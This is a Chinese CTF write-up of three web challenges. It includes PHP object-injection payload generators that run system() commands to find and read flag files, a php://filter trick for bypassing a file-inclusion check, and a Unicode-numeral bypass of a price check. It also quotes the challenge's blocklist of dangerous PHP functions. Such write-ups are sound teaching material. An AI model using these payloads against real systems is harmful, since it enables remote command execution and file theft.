网鼎杯2020 phpweb

页面会隔一段时间刷新,还有个报错

  1. Warning: date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24
  2. 2021-08-20 07:59:52 am

有data函数,抓包看看刷新的操作
image.png
改一下试试
image.png
ban了,使用func=readfile&p=index.php读取文件

  1. <?php
  2.     $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
  3.     function gettime($func, $p) {
  4.         $result = call_user_func($func, $p);
  5.         $a= gettype($result);
  6.         if ($a == "string") {
  7.             return $result;
  8.         } else {return "";}
  9.     }
  10.     class Test {
  11.         var $p = "Y-m-d h:i:s a";
  12.         var $func = "date";
  13.         function __destruct() {
  14.             if ($this->func != "") {
  15.                 echo gettime($this->func, $this->p);
  16.             }
  17.         }
  18.     }
  19.     $func = $_REQUEST["func"];
  20.     $p = $_REQUEST["p"];
  22.     if ($func != null) {
  23.         $func = strtolower($func);      //将所有字符转换为小写
  24.         if (!in_array($func,$disable_fun)) {
  25.             echo gettime($func, $p);
  26.         }else {
  27.             die("Hacker...");
  28.         }
  29.     }
  30.     ?>

过滤了很多,没思路。看师傅操作用反序列化
image.png
ls没发现flag,grep也没找到,可疑文件都没有,用find / -name flag*
image.png

  1. <?php
  2. error_reporting(0);
  3.  class Test {
  4.     var $p = "find / -name flag*";
  5.     var $func = "system";
  6.     function __destruct() {
  7.         if ($this->func != "") {
  8.             echo gettime($this->func, $this->p);
  9.         }
  10.     }
  11. }
  13. $a = new Test();
  14. echo serialize($a);
  15. ?>

在tmp文件夹下找到了可疑文件,读一下试试,readfile不行,只能构造反序列化读取

  1. <?php
  2. error_reporting(0);
  3.  class Test {
  4.     var $p = "cat /tmp/flagoefiu4r93";
  5.     var $func = "system";
  6.     function __destruct() {
  7.         if ($this->func != "") {
  8.             echo gettime($this->func, $this->p);
  9.         }
  10.     }
  11. }
  13. $a = new Test();
  14. echo serialize($a);
  15. ?>

[BSidesCF 2020]Had a bad day

感觉是文件包含,看了报错

  1. Warning:  include(woofers'.php): failed to open stream: No such file or directory in <b>/var/www/html/index.php
  2. Warning:  include(): Failed opening 'woofers'.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php

感觉是文件包含但可能需要bypass open_basedir,伪协议试一下读取index.php

  1. ?category=php://filter/convert.base64-encode/resource=index
  1.  <?php
  2. $file = $_GET['category'];
  3. if(isset($file))
  4. {
  5.     if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
  6.         include ($file . '.php');
  7.         }
  8.     else{
  9.         echo "Sorry, we currently only support woofers and meowers.";
  10.         }
  11. }
  12. ?>

只要满足一个或者条件就可以往下就行了。但是如果有woofers或者meowers就无法读取了,这里有个新的trick。

  1. ?category=php://filter/convert.base64-encode/woofers/resource=flag

这样构造不影响不读文件

[ASIS 2019]Unicorn shop

image.png
id=1&price=9,id为1,2,3都提示商品错误,买4钱又不够
这题的考点是unicode编码安全,使用Unicode编码,找到一个字符的Unicode编码大于1337输入。
https://www.compart.com/en/unicode/
这个网站里有极全的Unicode编码字符,我找到了ↂ这个字符。它的Unicode大于1337。再次输入4和ↂ。其实直接输入“亿”也是可以的。